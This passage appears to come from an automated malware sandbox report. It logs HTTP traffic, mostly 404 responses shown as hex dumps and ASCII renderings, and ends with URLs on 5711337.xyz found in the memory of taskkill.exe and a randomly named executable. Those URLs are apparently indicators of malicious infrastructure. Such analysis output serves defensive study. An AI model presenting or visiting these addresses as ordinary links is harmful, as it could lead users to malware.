f9 97 f8 d8 85 c5 dc 2b 32 81 7f 5c 94 13 59 fa 5f 2f 49 53 fe 24 80 d7 24 ee ff df e2 2a 2f 73 10 06 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:10:02 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 7c 3e 4e da 9c 8c db 66 6c 6e a9 a9 85 ca d1 45 e4 af 53 47 43 95 b7 d5 46 4a 92 a0 26 04 f8 4b 8e 11 90 84 3d 61 7e f6 c0 4c 00 51 29 6a 45 84 83 d6 e6 28 79 8d 29 73 61 3b 49 0f 39 aa 3c d6 d8 fc 7d 63 9d a8 0e be 15 71 c6 a7 71 2e 69 75 da fa a1 d7 8a f8 71 9c e0 d5 9b f3 30 4f 7e 42 b7 70 9e f7 12 8e 69 0e 13 30 6b 6d 38 18 62 52 bb ee ba 3d b2 5a 0a 3e ae 21 4e 82 15 3f 20 47 77 cb 6e a2 c8 8e 72 2e 54 ed fb 86 16 6f 3c 4e 7a 8d 81 1c ec 1d 89 aa fe 9f 0e 2d 58 4b eb 29 ee 03 4a 8b 87 29 4a ff 4e d5 df 97 22 1b dc b0 22 3b ed b3 22 5c b0 c1 d2 e0 62 8b 98 a4 d6 96 38 f4 ba 9f 9b b3 66 0d 26 73 b0 32 e2 b2 1a 84 87 86 5c 98 83 cb fd fc be 27 15 23 32 1f 32 58 77 97 28 2f ea 60 14 
f9 97 f8 d8 85 c5 dc 2b 32 81 7f 5c 94 13 59 fa 5f 2f 49 53 fe 24 80 d7 24 ee ff df e2 2a 2f 73 10 06 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:10:05 GMTData Raw: 36 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 74 79 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 33 36 62 36 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4e 75 6e 69 74 6f 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 
68 74 3a 20 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 75 6c 6c 2d 68 65 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6c 65 78 2d 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 70 6f 73 69 74 69 6f 6e 2d 72 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 13:10:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 13:10:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 13:10:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 13:10:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Fri, 11 Oct 2024 13:10:45 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-10-11T13:10:50.8884704Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:10:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: X_CACHE_KEY=77dc533e59e42f73c05af19411f726b6; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqQkCZDZlqjotnVSli0SrhIBkyJZrfys%2Bg3CqZCbGlTLAeytGpF6twqYB6PxcP3pXVjxTnO%2BpDUZhLWZrRHOWbfwnF1Q%2FlbeId%2FgJhBDbhSZcLiPLZDh%2B2vXS1nbWi8AvyyUZA8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f17bb8f7e7c99-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:10:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: X_CACHE_KEY=3f65d260df71e3f0c3e1a8bfc7229305; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ubVGFdSoGrzSt0lBmkYECZ%2Ba6kO3ciTerjsPku%2BMgGcQQ5L3DxR93lx8EQIwhBlweQzrBEJ5mROUxDiVtv%2FlyYagLwaT9j5DXx5UFLWebonVZi6Tb%2FhLnMVUu3QdBZclpPDZ%2B8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f17cb9942726f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:10:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: X_CACHE_KEY=b694735f45275bfcb0c061e26b966d7d; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p23OAMjux1d1BeP4qe7H2m9MpW%2F5elJDZJymMssUdiIihXySIvOqBjGPFV%2B%2F%2B5FX3ecWHrAoDiBFouuQ9jo4X9hrJ6JNg4CK%2FAGwk6T6ULfzaVc6Rgml2QHeZT0SldST3YC0dXw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f17dd4dc64331-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:10:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: X_CACHE_KEY=3be2390be999b7acd99030b3303a8b88; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPA%2Fg4b%2F4N57VuXMR7ZZW0Ydh59DGZ9gtkgYS3va18%2B99wVCdc40HMqkFP%2FKBwLuHggSTJOoNM02kcjDfa9aZLqhPVA6eBBDv%2FO%2BkdTLcOWIzZk8jijMm103Sl9xZ8gu6i54%2B%2F0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d0f17ed2d35191e-EWRalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:11:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:11:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:11:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:11:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/3605400.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/3872200.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/4350950.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/4777950.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/5074320.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/6095900.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/6782600.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/711549.jpg
